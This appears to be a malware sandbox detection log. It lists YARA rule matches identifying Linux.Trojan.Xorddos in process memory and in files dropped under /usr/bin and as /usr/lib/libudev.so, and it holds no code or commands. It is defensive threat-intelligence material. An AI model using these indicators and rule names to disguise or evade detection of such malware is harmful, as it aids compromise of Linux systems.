Source: Process Memory Space: dptxrnhxmx.elf PID: 6346, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6348, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6354, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6357, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6359, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6362, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6365, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6371, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6374, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6377, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6380, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6383, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6388, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6391, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6394, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6397, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6400, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6406, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6409, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6414, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6417, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/qabtuykfdb, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/tqdlzqtrvv, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/lib/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/rhlqbltizb, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/wrvptdarnp, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/mntlutgnfs, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/scllcnzpeu, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
